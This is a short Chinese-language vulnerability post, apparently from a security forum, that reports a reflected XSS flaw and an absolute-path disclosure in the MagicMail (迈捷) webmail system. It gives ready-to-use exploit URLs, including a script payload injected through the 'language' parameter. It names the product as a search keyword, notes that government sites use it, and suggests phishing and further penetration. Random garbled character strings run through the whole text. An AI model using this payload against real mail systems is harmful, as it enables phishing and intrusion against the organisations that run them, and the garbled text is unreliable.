今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞( \7 _4 L# o" ]- f. {2 g2 `
2 ~7 G& n& q3 ]2 q- b: z2 X9 W3 h
9 ?2 }4 H# X$ H9 s
包含 一个反射性XSS 以及 绝对路径泄漏
+ p3 D) a" Y# A% H# t& t看了看 貌似全部是linux的。; H9 z& J, t+ J7 G
) R8 }: L7 B q5 a# ` k" x
关键字:迈捷邮件系统 by MagicMail+ J: J! l" [6 h) D3 G& M+ A
9 ]2 p) ]* G% e. \
可以看到很多政府网站都用这个邮件系统8 C, `7 ^4 d) x2 o5 ^, C: ?/ }- D
( h j1 Q* l+ y3 u4 o; `: A绝对路径 http://madman.in/index.php?login_type=declare&language=
2 L6 ]3 T( f% W; {' e7 f6 W" I
( b6 t& _+ E' n- V& h% Q9 s& Z5 C7 I% R6 H L
1 M) r; ]7 G+ r6 |% f' o( XXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
( E& T0 \. S% N. u: m$ u# [" m5 p) z* D' h
, g# {& j" T" C* v
# v0 P0 O( N) @5 B$ ?虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等" Z/ Y! m5 z, |, H0 j
8 V/ i4 l% F4 j: S7 h
修复方案:看官方补丁吧。 m% S6 ^2 u" {/ R2 S* ?
|